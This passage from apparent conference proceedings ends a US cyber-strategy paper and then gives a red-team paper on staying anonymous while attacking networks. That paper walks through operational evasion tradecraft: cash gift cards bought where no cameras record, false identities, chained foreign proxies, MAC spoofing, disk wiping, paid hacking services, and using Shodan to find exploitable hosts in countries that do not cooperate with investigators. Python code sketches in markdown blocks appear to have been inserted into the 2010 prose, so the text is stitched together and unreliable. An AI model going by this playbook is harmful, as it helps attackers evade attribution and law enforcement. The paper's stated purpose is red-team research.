bodies charged with defending the United States’ efforts in cyberspace. This effort must include funding for<br />
the technology required to close the gaps in the security of our networked systems. A clear offensive<br />
strategy also needs to be articulated in the short term, especially one that explains how to abolish the<br />
anonymity behind which antagonistic countries shield their own offensive cyber operations. Funding for<br />
education also needs special consideration, as these antagonistic nations are funding and attracting<br />
top-notch talent to their cause instead of working to develop peaceful relations in this realm.<br />

In the long term, the hope is that we can create a much safer and more stable future by applying thoughtful<br />
design. In this sense, the long-term goal of cyber strategy and technological development should be to<br />
create a network infrastructure that anticipates attack rather than merely reacting to attacks that have<br />
already occurred. When the internet was initially developed, the idea was to create a communication<br />
scheme that was simple and open, allowing for evolution into a much more complex animal. Having gone<br />
through several revisions, it is time to update the protocols and methods used daily to decrease the ability<br />
and relative ease of cyber attack. This will be accomplished by setting long-term strategic goals and then<br />
funding technological initiatives that are in turn supported by policy, both domestic and international. The<br />
first step in supporting this strategy is to fund the minds interested in forming a safer internet: an internet<br />
that limits the anonymity of attackers, separates classified networks from the unclassified, develops systems<br />
where security is integral to the design, and creates a robust network that recovers gracefully from error and<br />
attack while limiting the scope of that attack at every level. This is where funding is necessary for new<br />
research and innovation in the relatively immature field of computing and networks.<br />

7. Conclusion<br />

Cyberspace is dangerous and scary. The borders are vast and the landscape is constantly changing.<br />
Fortunately, operating in cyberspace offers excellent rewards, and given an appropriate but flexible strategy,<br />
reinforcing policy measures, and the drive to guide technological development, cyberspace can also be a<br />
safe place to operate. This paper should serve as a call to make strides in these three areas, and humbly<br />
offers a base guide to tackling both present and future issues in cyberspace.<br />

References<br />

Agence France-Presse, US military prepares for ‘cyber command’: official. ABS-CBN News. Available at: http://www.abscbnnews.com/technology/04/24/09/us-military-prepares-cyber-command-official [Accessed September 11, 2010].<br />

Alexander, K., Advanced Questions for Lieutenant General Keith Alexander, USA, Nominee for Commander,<br />

United States Cyber Command, Available at:<br />

http://docs.google.com/viewer?a=v&q=cache:Kcm4Wm7WxDcJ:armedservices.senate.gov/statemnt/2010/04%2520April/Alexander%252004-15-10.pdf+Advance+Questions+for+Lieutenant+General+Keith+Alexander,+USA+Nominee+for+Commander&hl=en&gl=us&pid=bl&srcid=ADGEESii_NfX8DuWogAeIT3BXixKWHsUgQjUlYpebRb4XQjwsDRhXLVTbXwlaGTT7EulMH-DBJeo4rim_l2kT3M32rWC7AxmMzROsxLQwQVOYDVY2Gi9pKohKDV89kkb-GHIOMwFll3A&sig=AHIEtbSnKTroECzRqeFhTGnXyvf4JMu62A [Accessed September 11, 2010].<br />

Arquilla, J., 2007. Information strategy and warfare : a guide to theory and practice, New York: Routledge.<br />

Baocun, W. & Fei, L., INFORMATION WARFARE. Available at:<br />

http://www.fas.org/irp/world/china/docs/iw_wang.htm [Accessed September 11, 2010].<br />

Campen, A., 1992. The first information war : the story of communications, computers, and intelligence systems<br />

in the Persian Gulf War, Fairfax Va.: AFCEA International Press.<br />

Clarke, R., 2010. Cyber war : the next threat to national security and what to do about it 1st ed., New York: Ecco.<br />

Department of Homeland Security, DHS | Office of Cybersecurity and Communications. Available at:<br />

http://www.dhs.gov/xabout/structure/gc_1185202475883.shtm [Accessed September 11, 2010].<br />

Fulghum, 2007. Israel used electronic attack in air strike against Syrian mystery target. ABC News. Available at: http://abcnews.go.com/Technology/story?id=3702807&page=1 [Accessed September 11, 2010].<br />

Leyden, J., 2008. Estonia fines man for DDoS attacks • The Register. The Register. Available at:<br />

http://www.theregister.co.uk/2008/01/24/estonian_ddos_fine/ [Accessed September 11, 2010].<br />

Markoff, J., Google Asks N.S.A. to Investigate Cyberattacks - NYTimes.com. Available at:<br />

http://www.nytimes.com/2010/02/05/science/05google.html?fta=y [Accessed September 11, 2010].<br />

Markoff, J. & Barboza, D., Chinese Academics’ Paper on Cyberwar Sets Off Alarms in U.S. - NYTimes.com.<br />

Available at: http://www.nytimes.com/2010/03/21/world/asia/21grid.html?_r=1 [Accessed September 11,<br />

2010].<br />

Markoff, J., Sanger, D.E. & Shanker, T., CYBERWAR - In Digital Combat, U.S. Finds No Easy Deterrent - Series<br />

- NYTimes.com. Available at:<br />

http://query.nytimes.com/gst/fullpage.html?res=9404E4DE123BF935A15752C0A9669D8B63 [Accessed<br />

September 11, 2010].<br />

Miller, F.P., Vandome, A.F. & McBrewster, J., 2010. Information Operations Roadmap.<br />

Miniwatts Marketing Group, United States Internet Usage, Broadband and Telecommunications Reports -<br />

Statistics. Available at: http://www.internetworldstats.com/am/us.htm [Accessed September 11, 2010].<br />

msnbc.com staff, U.S. eyes N. Korea for ‘massive’ cyber attacks - Technology & science - Security - msnbc.com.<br />

Available at: http://www.msnbc.msn.com/id/31789294 [Accessed September 11, 2010].<br />

Office of Force Transformation, 2005. Implementation of Network-Centric Warfare, Office of Force<br />

Transformation.<br />

Reuters, FBI probes cyber attack on Citigroup: report | Reuters. Available at:<br />

http://www.reuters.com/article/idUSTRE5BL0I320091222 [Accessed September 11, 2010].<br />

Trias, E.D. & Bell, B.M., Cyber This, Cyber That . . . So What? Air & Space Power Journal, Spring 2010.<br />

Available at: http://www.airpower.maxwell.af.mil/airchronicles/apj/apj10/spr10/trias.html [Accessed<br />

September 11, 2010].<br />

Wallace, R., 2009. Spycraft : the secret history of the CIA's spytechs, from communism to Al-Qaeda, New York:<br />

Plume.<br />

Waterman, S., Analysis: Who cyber smacked Estonia? - UPI.com. Available at:<br />

http://www.upi.com/Business_News/Security-Industry/2007/06/11/Analysis-Who-cyber-smacked-<br />

Estonia/UPI-26831181580439/ [Accessed September 11, 2010].<br />



Catch me if you can: Cyber Anonymity<br />

David Rohret and Michael Kraft<br />

Joint Information Operations Warfare Center (JIOWC) Texas, USA<br />

drohret@ieee.org<br />

mkraft5@csc.com<br />

Abstract: Advances in network security and litigation have empowered and enabled corporations to conduct<br />
Internet and desktop surveillance of their employees, to increase productivity, and of their customers, to gain<br />
valuable marketing data. Governments have spent billions to monitor cyberspace and have entered agreements<br />
with corporations to provide surveillance data on adversarial groups, competitors, and citizenry (Reuters, 2010).<br />
Examples include the Chinese government’s monitoring of the Internet (Markoff, 2008), the United Kingdom’s<br />
plan to track every email, phone call, and website visited (Whitehead, 2010), and the recent announcement from<br />
the United States of a program named “Perfect Citizen” that will be used to identify those committing cybercrimes<br />
and terrorist activities (Bradley, 2010). These government surveillance programs have many concerned that<br />
anonymity on the Internet is non-existent, and that the real objectivity and candidness found on news,<br />
educational, and research websites is being replaced with a “big brother” atmosphere, preventing open<br />
discussion and information transfer between domains. Although the initial intent of network and Internet<br />
monitoring may be honourable, terrorists, hackers, and cyber-criminals already have access to the tools and<br />
methodologies necessary to continue their activities unabated. State and non-state adversaries can use these<br />
same tools and methodologies to divert malicious and offensive actions towards a common adversary, avoiding<br />
attribution while increasing tensions among non-actors. Concerned educators, scientists, and citizens are<br />
rebelling against Internet monitoring, providing the impetus for developers and entrepreneurs to create methods,<br />
tools, and virtual private networks that provide secrecy for those wishing to remain invisible, avoiding detection<br />
by employers, law enforcement, and other government agencies (Ultimate-Anonymity, 2010). The intent of this<br />
research is first to briefly identify the efforts required by governments to track and monitor individuals and groups<br />
wishing to remain anonymous within the cyber community. The authors define “cyber community” as the<br />
boundaries of any tool, process, or mechanism utilizing Transmission Control Protocol (TCP)/Internet Protocol<br />
(IP) or similar protocols that allow for the transfer and aggregation of information and data. The authors then<br />
identify a process to remain wholly anonymous in the context of an internet identity. This is demonstrated in a<br />
step-by-step case study using a “paranoid” approach to remaining anonymous.<br />

Keywords: anonymity, network, internet surveillance, foreign proxy, hacker, big brother<br />

1. Terms defined

The term Internet anonymity, and the abstract or hypothetical optimum of remaining anonymous, have differing definitions based on the "completeness" of anonymity desired. In several definitions, "anonymous" simply means remaining obscure (Answers.com, 2010), and not necessarily completely hidden from sight. In other definitions, anonymous refers to remaining nameless, without shape or form (wordnetweb.princeton.edu, 2010), and this is the definition the authors have used throughout this paper.

This theme also extends to other terms that describe deception, the destruction of data, or misdirection; specifically, the completeness of the action being described. The word "government" will also be used in a manner that includes all government entities, including law enforcement, military, and intelligence agencies.

2. Overview

Network-centric red teams are charged with emulating known adversaries and hackers (remote and insider threats) using, for the most part, only open-source and publicly accessible tools and software. Unlike penetration testers, who use exploits to validate vulnerabilities, red teams are responsible for viewing networks or systems from every angle to defeat the defences in place. This includes, but is not limited to, physical security, biometrics, social engineering, and, of course, preventing the blue team from assigning attribution to the red team's actions. In this type of security stress-test a client is able to fully realize their system's security posture, which encompasses much more than a vulnerability scan and penetration test.

Governments and corporations have realized the advantages of communications and data transfers via the Internet for economic and defensive purposes. They have also realized the dangers and costs of cyber crime, malicious hacking, espionage, and cyber warfare, developing new technologies and implementing new legislation to defend networks and to trace/track attacks to their electronic point of origin (EPO). Without verification and validation, courts will not convict and governments are unwilling to counter-attack, as clear attribution cannot be assigned.

David Rohret and Michael Kraft

In order to remain anonymous or assign blame to another party, the authors use the Praestigiae Cone (Rohret & Jett, 2009) displayed in Figure 1. The Praestigiae Cone can be visualized as seven protective layers (cone architecture) used in multiple steps to allow hackers, adversaries, or any other group to operate from a cloaked vantage point. The organization or individual attempting to identify what the shields are hiding can attack any of them at one time, but cannot move from one layer to the next without first solving the initial "who-is" puzzle for the layer they have identified. Making the task of identifying the actual user(s) more difficult is that each shield is time-sensitive, creating a fast-moving defensive environment that is held hostage to a cyber criminal's (or user's) schedule.

Figure 1: The Praestigiae Cone is used to hide and deceive those trying to identify the original source of an attack or network traffic (Rohret & Jett, 2009)

As difficult as it appears for law enforcement and government agencies to crack all seven layers, it only takes one mistake or misstep by an adversary or hacker to allow investigators to see their true identity. Therefore, the authors have provided a brief description of known capabilities to establish the requirement for an adversary to take the seemingly paranoid precautions, identified later in this paper, in order to remain anonymous.

3. Identifying and tracking Internet users

"...the FBI successfully infected the anonymous source's computer, and they soon discovered his identity" (Begun, 2009).

In order to quantify the actions taken to remain anonymous we must first identify the many ways an individual or group can be located, tracked, and discovered. By no means are the methods described below used solely for cyber crimes or cyber warfare, but they are a major part of a government's arsenal in fighting cyber crime and dissidents. Because there are so many different tools and techniques used by different governments and agencies, the authors have generalized techniques, using specific examples to represent the greater capabilities. This brief overview will help to demonstrate why a paranoid approach is required to protect an anonymous identity on the Internet.

Trojans, Beacons, and Worms

The above quote from Daniel Begun illustrates one way to identify illegal media downloads or snooping hackers. The process is as easy as providing interesting material on known download sites with embedded Trojans or beacons that notify law enforcement of the violation. Although effective, it is difficult for government agencies to target specific groups or individual violators, as this process is more of a reverse phishing expedition. For targeting specific groups, such as cyber criminals or adversarial governments, similar techniques would be used with live data or in a well-designed honeypot that seemingly held the type of data the targeted group would maintain on their site. The music industry has had minor successes using these techniques (Associated Press, 2005).

Financial Transactions

Financial transactions can easily be associated with an individual wherever they take place. For an international economy to work, governments and corporations, often at odds with one another, must work together to prevent crimes that threaten markets and currencies. Because the world has rapidly become digitized, credit cards, Internet payment services, and smart-phone purchases allow anyone with a bank account to be a consumer. Furthermore, most businesses and banks now utilize video surveillance at the point of transaction, creating a scenario where even cash purchases of a serial-numbered commodity or a financial document can lead investigators to a digital picture of the perpetrator. The United States' Financial Crimes Enforcement Network (FinCEN), established in 1990, is considered the leading expert in solving crimes involving financial transactions, including cyber crimes (Kimery, 2010; FinCEN, 2010).

Digital and Cellular Communications

"It's time for you to get some new cell phones, quick," was the warning given to Brian Ross and his ABC News investigation team (Ross, 2006) by someone they considered an NSA insider. This older news story describes an agency leak that identified how intelligence agencies (and presumably law enforcement agencies) are able to track individuals using telecommunications for activities they (the agency) deem interesting or counter to national security. Radio Frequency (RF) triangulation to pinpoint the locations of smart phones and other on-line digital devices is also possible with the use of good spectrum analyzers and a direction finder. This applies to 802.11, 802.16, GSM, CDMA, and other Internet Protocol (IP) over radio and wireless standards.

Tracking Internet Traffic

The most common method of identifying malicious Internet activity and attempting to identify the culprit is through network and Internet surveillance. Intrusion detection systems, intrusion prevention systems, intelligent and stateful firewalls, packet sniffers, etc., provide network administrators and cyber crime investigators powerful tools for identifying attack signatures, and sophisticated pattern analyses help investigators attribute an attack or malicious actions to a specific group or individual. This is not to say they know the actual identity of the group or individuals involved, but rather that they can match patterns of attacks or actions with enough confidence to suggest that the same perpetrators were involved. These capabilities have become more precise in recent years as corporations and governments cooperate in sharing information and sensor data. For example, the marriage between the search-engine giant Google and the NSA made headlines, sending shock waves through the Internet community and creating worries that anyone can be "spied" on at any time (Reuters, 2010). An adversary or malicious hacker must also assume that international arrangements and agreements have been implemented, providing world-wide coverage and tracing capabilities.

Computer Forensics

Possession of a suspect's computer is the golden egg for investigators. The term computer forensics, as used in this paper, refers to identifying incriminating evidence on the suspect's system or a storage device used by the suspect. Entire computer laboratories are dedicated to forensic analysis for identifying incriminating evidence, ranging from simple low-tech techniques to highly sophisticated electron interferometry. An example of a low-tech analysis would be the capture of a system that is still running and accessible, whereas electron interferometry involves reading open and closed memory gates in a system's memory at temperatures below negative 60 Celsius, even if the system has been shut down for several minutes (Vourdas & Sanders, 1998).

Physical Investigations

"Feet" on the ground to identify patterns and locations are part of the final stage of an investigation to identify and/or catch a suspect. This includes using video surveillance from Internet cafes frequented by the suspect, or an old-fashioned stake-out to catch them in the act. Cyber crime investigations are commonplace and many are high profile, prompting law enforcement agencies to allocate significant resources to rapidly solve cases.

4. A paranoid approach to remaining anonymous

Why a paranoid approach to anonymity? Governments, adversaries, corporations, cyber criminals, even cheating spouses require a repeatable process they can employ to accomplish sensitive activities across the World Wide Web without detection or retribution. In a recent article prepared for the North Atlantic Treaty Organization (NATO) Parliamentary Assembly (Myrli, 2010), the cost of cyber crime to governments and corporations is reported to be over US $100B annually. In response to cyber crime, governments and corporations spend billions more on technology and methodologies to identify, track, and prosecute cyber criminals (Fenwick, 2010). Not only have governments increased expenditures and resources to combat cyber crime, there is now unprecedented cooperation among governments and corporations to provide data and information sharing to identify and/or capture offenders (Golubev, 2005). Therefore, for an adversary or cyber criminal to successfully use the Internet for nefarious purposes and remain anonymous, they must take a holistic view of the security available to their intended targets; that is to say, they must assume each capability is available and successfully deployed. Just as a network security officer does not have the luxury of defending against only some or most of the vulnerabilities on their network, a cyber criminal or cyber warrior cannot depend on a law enforcement agency to use only some of the methods described in section 3.

This paper is the result of research into adversarial capabilities in cyber warfare, specifically, how a network-centric red team, acting as the adversary, would prevent positive attribution after conducting network reconnaissance or an attack. The following case study reflects the precautions and actions used to create the shields in the Praestigiae Cone, described in Figure 1, using combinations of publicly available technology, services, and research. Figure 2 outlines the process of achieving the seven shields, resulting in complete anonymity. The details are explained using a scenario based on an actual case study involving a red team assessment of an enterprise network.

Figure 2: A process for remaining anonymous in cyber space

Scenario: The red team's goal was to emulate a hacker's capability to remotely identify and disable an automated network-controlled surveillance system that included wireless video, fence and ground sensors, autonomous vehicle sentries, and network security, without being identified as the adversary. The red team assumed that all networks were monitored and that Internet service providers, search engines, and even proxy services would provide information to authorities in a timely manner. Each action taken by the red team, and all services purchased and used, are publicly available and operating in a legal capacity. The following steps provided Internet and network anonymity, allowing the red team to accomplish its mission without allowing security managers to assign attribution to the attack.

Physical Security and Financial Shields

The red team's first step was to build laptop systems specifically for this requirement. This included downloading free VM software for the installation of multiple operating systems. By using freely distributed VM software, the red team was able to avoid having information identifying their use of VM software recorded through registration services or processes (Oracle, 2010). Operating systems already configured for use in a VM environment were also available for public download, and each download and installation was accomplished from a non-authenticating Internet cafe. Two anonymity proxy services were required; these were purchased using two separate MasterCard gift cards that were themselves separately purchased with cash at two convenience stores found not to be using video surveillance.

Virtualization and Spoofing Shields

Creating a system that provides protection against evidence retrieval is vital for a red team emulating adversarial techniques. Virtual operating systems provide developers and administrators the capability to create instances of an entire network for testing and evaluation; similarly, cyber criminals and adversaries use virtual networks for pre-exploit testing and as disposable systems following an attack or exploitation. If all other layers of anonymity fail, it is imperative that attribution cannot be determined from information, logs, or data found on the attacker's host system. In this case study, our red team used multiple pre-built virtual machines on re-usable host systems, creating temporary and disposable attack platforms. Continuing our paranoid approach, we used open-source resources to download and install the following files using a false identity:

Virtual Machine Hosting Software: The authors downloaded Microsoft's Virtual PC 2007 software. With Microsoft Virtual PC 2007, you can create and run one or more virtual machines (each with its own operating system) on a single computer, providing the flexibility to use different operating systems on a single host platform (Microsoft, 2010).

Virtual Machine Images: Virtual operating system images can be obtained in several ways; they can be loaded directly into the VM system (using un-registered software) or downloaded already built. Windows XP or Vista VM images are available at no cost from the National Institute of Standards and Technology (NIST, 2010), and a Linux distribution was also obtained from an open-source location (Back|Track-Linux.org, 2010). Hacker forums, how-to publications, and trial downloads also provide source locations for acquiring operating systems to populate your virtual machines without a financial or registration trail.

Host and VM System MAC Spoofing: Every network interface card (NIC) is assigned a unique serial number called a media access control (MAC) address. An investigator or network security officer can trace a MAC address in a similar way that an IP address is traced, by simply using a packet-sniffing tool, like Wireshark, and filtering traffic by the MAC. Many novice hackers or careless cyber criminals will neglect spoofing MAC addresses prior to an attack, and just as often forget to change them back to the original following an attack. In the red team's quest to eliminate any trace of their attacking systems on their host platforms, they used publicly available freeware called Spoofmenow.exe (SourceForge, 2010) to change the MAC addresses of both the VM system and their host platforms. Once the red team's actions were completed (for each session), they returned the host system to the original MAC address and deleted the VM system. This would prevent investigators from identifying the host system as the computer used for an attack, even if no other evidence was available. It was necessary to change the VM system's MAC address for two reasons: first, changing the MAC address to a manufacturer that reflected the location of the proxy server used for the attack created a better deception of where the attack originated from; secondly, and just as importantly, to avoid identifying the system used as a VM system, since most vulnerability scanners will identify the MAC address of a VM system as a virtual machine.
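The MAC-spoofing step above can be sketched in a few lines. The following Python fragment is illustrative only (the red team used Spoofmenow.exe): it generates a spoofed address that keeps a chosen vendor prefix (OUI) while randomizing the device-specific octets. The OUI shown is an arbitrary placeholder, not a real manufacturer assignment, and actually applying the address (e.g. with `ip link` on Linux) requires administrative privileges, so that step appears only as comments.

```python
import random

def spoofed_mac(oui="00:1A:2B"):
    # Keep a chosen vendor prefix (OUI, first three octets) and randomize
    # the last three octets. The OUI here is a placeholder; a deceiver
    # would pick one matching hardware common near the proxy's location.
    tail = ":".join(f"{random.randint(0, 255):02X}" for _ in range(3))
    return f"{oui}:{tail}"

# Applying the address on Linux needs root privileges, e.g. (not run here):
#   ip link set dev eth0 down
#   ip link set dev eth0 address 00:1A:2B:7F:03:9C
#   ip link set dev eth0 up

mac = spoofed_mac()
print(mac)
```

Restoring the original address afterwards, as the red team did, is the same operation with the NIC's factory-assigned value.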

Proxy and Remailer Shields

The side effect of increased capabilities by law enforcement is an increase in on-line services to help defeat those capabilities, such as anonymous proxies and remailers. Proxies are servers that act as go-betweens, making requests for data on behalf of clients. A proxy receives a "request" for a file, website, or other resource from a client, connects to the remote site, obtains the information, and sends it back to the client. Remote proxies can allow you to surf the Web privately without being monitored, and are widely used by individuals who download copyrighted media or those who circumvent network security measures in order to view blocked websites (Hazel Morgan, 2010).
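The go-between role of a proxy can be illustrated with Python's standard library. This is a minimal sketch: the proxy address below is a documentation placeholder (TEST-NET range), not a real service, and the actual request is left commented out because it would require network access.

```python
import urllib.request

# Placeholder endpoint standing in for a rented anonymous proxy;
# 203.0.113.0/24 is reserved for documentation examples.
PROXY = {"http": "http://203.0.113.10:8080",
         "https": "http://203.0.113.10:8080"}

def build_proxied_opener(proxies):
    # Requests made through this opener are relayed via the proxy,
    # so the destination server sees the proxy's IP, not the client's.
    handler = urllib.request.ProxyHandler(proxies)
    return urllib.request.build_opener(handler)

opener = build_proxied_opener(PROXY)
# opener.open("http://example.com")  # not executed here: needs network access
```

Chaining proxies, as the red team did, amounts to pointing one such endpoint at another, each hop hiding the hop before it.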

An anonymous remailer is an email service which receives client messages (with embedded instructions on where to send them) and then forwards the messages without revealing where they originally came from. By not maintaining a user list or a log of the addresses their messages were sent to, a remailer can ensure that any forwarded message leaves no internal information behind that could be used to break identity confidentiality (Wikipedia, 2010).
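The forwarding behaviour described above can be sketched as follows. The `X-Remail-To` instruction header and the remailer address are illustrative assumptions, not the protocol of any particular remailer service.

```python
from email.message import EmailMessage

def anonymize(msg, remailer_addr="remailer@example.org"):
    # Build a fresh message rather than editing the original, so the
    # From/Received/Message-ID chains are simply never copied.
    # Nothing about the original sender is logged or retained.
    out = EmailMessage()
    out.set_content(msg.get_content())
    out["From"] = remailer_addr            # the remailer replaces the sender
    out["To"] = msg["X-Remail-To"]         # destination embedded by the client
    out["Subject"] = msg.get("Subject", "")
    return out
```

A client embeds the true destination in the (hypothetical) X-Remail-To header before sending the message to the remailer, which then forwards a copy carrying only its own identity.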

Two proxy services were used by the red team. The first proxy service, Ultimate-Anonymity (Ultimate-Anonymity, 2010), was purchased using the first cash gift card and a false identity at a non-authenticating wireless cafe. Red team members quickly set their proxy location to a proxy in India via an encrypted VPN. Using an on-line IP lookup after starting the anonymous proxy service, the red team confirmed they were seen on the Internet as originating from the location in India, as shown in Figure 3.

Figure 3: This screen capture was acquired using an IP lookup from the host system; it shows that the host is associated with an IP address from an Internet service provider located in India, and even provides the information in the host ISP's primary customer languages
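The confirmation step can be sketched as parsing a geolocation lookup response. The JSON field names below are a generic assumption, as real IP-lookup services vary, and the sample response merely simulates the kind of result the red team observed in Figure 3.

```python
import json

def apparent_location(lookup_json):
    # Parse a geolocation service's response and report where the
    # proxied host appears to be on the Internet. Field names are a
    # generic assumption; real lookup services differ.
    data = json.loads(lookup_json)
    return f'{data["ip"]} appears in {data["city"]}, {data["country"]}'

# Simulated response (203.0.113.0/24 is a documentation address range):
sample = '{"ip": "203.0.113.77", "city": "Mumbai", "country": "India"}'
print(apparent_location(sample))  # 203.0.113.77 appears in Mumbai, India
```

A mismatch between the reported location and the chosen proxy would indicate a leak in the chain, so this check was repeated after each proxy change.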

The second proxy service, HideMyAss.com (HMA), was purchased using the second gift card from another non-authenticating wireless cafe while connected through the first proxy, using a different false identity (HideMyAss.com, 2010). HMA's user-friendly interface allowed the red team to choose multiple proxies in the Netherlands and Russia, changing IP addresses every 10 minutes.

Although anonymous proxy services advertise that they do not maintain user logs and delete user information in a timely manner, the red team assumed the anonymous proxy services would cooperate with investigators. Therefore, the red team would not use each proxy service for more than one session, repeating the process for each follow-on action using different proxy locations, session locations, and new identities.

Data (Evidence) Removal Shield

There are various levels of paranoia, which will dictate how one might try to destroy the computer evidence. One might have little paranoia and decide to just delete the virtual machine from the computer. A more nervous approach might include using a disk cleaner, wiping a hard drive in accordance with the DoD 5220.22-M standard (www.usaid.gov, 2010), which features multiple overwrites of random characters. Open-source programs are also available: Darik's Boot and Nuke (DBAN) is a self-contained boot disk that securely wipes the hard disks of most computers. DBAN will automatically and completely delete the contents of any hard disk that it can detect, which makes it an appropriate utility for bulk or emergency data destruction (Sourceforge, 2010). Lastly, after completing disk scrubbing, the extreme case of paranoia might include destroying the computer by physically damaging the hard drives and memory.
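The multiple-overwrite idea behind such standards can be sketched for a single file. This is illustrative only: real tools like DBAN operate on whole disks beneath the filesystem, and journaling filesystems or SSD wear-levelling may retain copies that a file-level overwrite cannot reach.

```python
import os

def overwrite_and_delete(path, passes=3):
    # Overwrite a file's contents in place several times with random
    # bytes before deleting it, in the spirit of multi-pass wiping.
    # A sketch only: the filesystem may still hold older copies.
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            f.write(os.urandom(size))   # one pass of random characters
            f.flush()
            os.fsync(f.fileno())        # push this pass to the device
    os.remove(path)
```

The pass count is the only parameter; a more paranoid wipe simply raises it before the file is finally unlinked.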

Location/Deception and Time Shields

As discussed earlier, time is the adversary's or cyber criminal's ally. The end goal is to accomplish an action without being identified or having it attributed to your team. By using a disciplined approach and restricting the amount of time each session is executed, each proxy service is used, and an identity is held, investigators will be kept busy allocating resources to identify computers and users that no longer exist. Even if investigators are eventually able to locate one of the EPOs, the perpetrator will have completed their mission and moved on to a new location with a new identity. Solving computer crimes requires resources and specific skill sets that are not always readily available, even to the most advanced cyber crime organizations. By remaining difficult to trace and providing multiple targets that are easily erased, the perpetrator ensures that authorities will not be able to focus their efforts quickly enough to locate and positively identify the offender.

The key component of keeping time as your ally is preventing a positive identification of your location. By location the authors refer to both the physical location of the attacker and their perceived location. Earlier we discussed the use of multiple non-authenticating Internet cafes and the use of multiple foreign proxies, one tunneled through the other, but there are other methods to hide your true location: the use of third-party hackers and on-line resources that identify exploitable computers. Third-party hacking services are available and can be purchased using a gift card while logged onto a proxy service. Furio Gaming (Furio Gaming, 2010) is one such service that will either hack a system for you or will provide you the tools to do so. This service represents itself as a gaming and hacking company and is located in a foreign country, providing a layer of anonymity in itself. Other on-line services, such as Shodanhq.com (SHODAN, 2010), provide an easy-to-use research tool allowing hackers to identify exploitable systems in every country. By identifying and exploiting a vulnerable system in a country that may not cooperate with the country you are working in, a cyber criminal can execute their objectives with little fear of attribution. Another method, for individuals or organizations with greater resources, would be to set up and configure their own anonymous proxies in countries and locations that have liberal or non-existent cyber laws. For large-scale cyber attacks or highly profitable schemes, this method may be more applicable and more robust.
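A query against such a research tool can be sketched as composing a REST search URL. The endpoint and parameter names below mirror Shodan's public search API as the authors understand it and should be treated as assumptions; the key and country code are placeholders, and no request is actually made.

```python
from urllib.parse import urlencode

def build_search_url(query, api_key,
                     base="https://api.shodan.io/shodan/host/search"):
    # Compose a search URL for a Shodan-style host search. Endpoint and
    # parameter names are assumptions based on Shodan's documented API;
    # the key is a placeholder, not a real credential.
    return f"{base}?{urlencode({'key': api_key, 'query': query})}"

# e.g. hosts exposing telnet in a placeholder country "XX":
url = build_search_url("port:23 country:XX", "PLACEHOLDER_KEY")
# The request itself is not made here; it would need a valid key
# and network access.
```

Issuing such queries through the proxy chain described earlier keeps even the reconnaissance step unattributable.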

5. Summary

The inexpensive solution to cyber anonymity outlined in this case study can easily be implemented with minimal resources and without expert skill levels. Movies and television shows, such as "24" (IMDB 24, 2010) and "Live Free or Die Hard" (IMDB Live Free or Die Hard, 2010), depict governments and advanced cyber techniques that can pinpoint network and Internet users in real time, but for the most part these capabilities do not exist. The fact remains that tracking a cyber criminal requires extensive resources and is a time-consuming process involving multiple agencies and governments. It is also imperative that government decision makers be wary of assigning attribution to a specific country or group for an attack or malicious action, as the current state of cyber defence and investigation relies heavily on the offending group making a mistake that would provide positive identification. The authors do not intend to imply such capabilities cannot be or are not being developed, but rather that the current state of Internet security and cyber laws does not provide sufficient capabilities and processes for positive attribution. As this case study has demonstrated, even if authorities are able to follow an attack or cyber crime to its electronic point of origin, that trail will only lead to a non-traceable false identity. Catch me if you can.



References

Answers.com. Anonymity definition. http://www.answers.com/topic/anonymity. Oct 2010.
Associated Press. Teen Convicted of Illegal Net Downloads. http://www.msnbc.msn.com/id/7122133/. March 7, 2005.
Back|Track-Linux.org. VMware Fusion 3.1. http://www.backtrack-linux.org/downloads/. Oct 2010.
Begun, Daniel A. FBI Uses Spyware to Capture Cyber Criminals. Hothardware.com, April 20, 2009. http://hothardware.com/News/FBI-Uses-Spyware-to-Capture-Cyber-Criminals/. 1 Oct 2010.
Bradley, Tony. NSA 'Perfect Citizen' Raises 'Big Brother' Concerns. PC World, July 08, 2010. http://www.networkworld.com/news/2010/070810-nsa-perfect-citizen-raises-big.html. Oct 2010.
Fenwick, Samual. Cyber security – believe the hype? Industrial Fuels and Power. http://www.ifandp.com/article/006583.html. August 18, 2010.
FinCEN. http://www.fincen.gov/. Oct 2010.
Furio Gaming. http://www.furiogaming.com/index.php?page=home. Oct 2010.
Golubev, Vladimir. International Cooperation in Fighting Cybercrime. Computer Crime Research Center. http://www.crime-research.org/articles/Golubev0405. April 16, 2005.
Hazel Morgan, e. C. (2010, March). Information on How Proxies Work. Retrieved October 12, 2010, from eHow: http://www.ehow.com/facts_6054712_information-proxies-work.html.
HideMyAss.com. Anonymous remailer and proxy service. http://www.HideMyAss.com. April 13, 2010.
IMDB. 24 (2001 - 2010). http://www.imdb.com/title/tt0285331/. Oct 2010.
IMDB. Live Free or Die Hard (2007). http://www.imdb.com/title/tt0337978/. Oct 2010.
Kimery, Anthony. Big Brother Wants to Look in your Bank Account. http://www.wired.com/wired/archive/1.06/big.brother_pr.html. 25 Sep 2010.
Markoff, John. Surveillance of Skype Messages Found in China. New York Times: Internet. 1 October, 2008.
Microsoft. Microsoft Virtual PC 2007. http://www.microsoft.com/downloads/en/details.aspx?FamilyId=04D26402-3199-48A3-AFA2-2DC0B40A73B6&displaylang=en. Oct 2010.
Myrli, Sverre. 173 DSCFC 09 E bis – NATO and Cyber Defence. NATO Parliamentary Assembly. http://www.nato-pa.int/default.asp?SHORTCUT=1782. Sep 10, 2010.
NIST. National Institute of Standards and Technology. http://csrc.nist.gov/. Oct 2010.
Oracle. Oracle VM VirtualBox. http://dlc.sun.com/virtualbox/vboxdownload.html. Oct 2010.
Reuters. Google, NSA to team up in cyberattack probe. February 4, 2010.
Rohret, David M. and Jett, Andrew. Red Teaming: A Guide to Non-kinetic Warfare. 2009.
Ross, Brian. Federal Source to ABC News: We Know Who You're Calling. ABC News. http://blogs.abcnews.com/theblotter/2006/05/federal_source_.html. May 15, 2006.
SHODAN. http://www.shodanhq.com/. Oct 2010.
Sourceforge. Darik's Boot And Nuke (DBAN). http://www.dban.org/. Oct 2010.
SourceForge. Spoof-Me-Now. http://sourceforge.net/projects/spoof-me-now/files/Spoof-Me-Now%20%28No%20Installer%29.zip/download. September 2010.
Ultimate-Anonymity. Anonymous remailer and proxy service. http://www.ultimate-anonymity.com/. July 7, 2010.
USAid.gov. DoD 5220.22-M. http://www.usaid.gov/policy/ads/500/d522022m.pdf. October 2010.
Vourdas, A., and Sanders, B. Determination of quantized electromagnetic-field state via electron interferometry. Europhys. Lett. 43 659 (1998). doi: 10.1209/epl/i1998-00414-0.
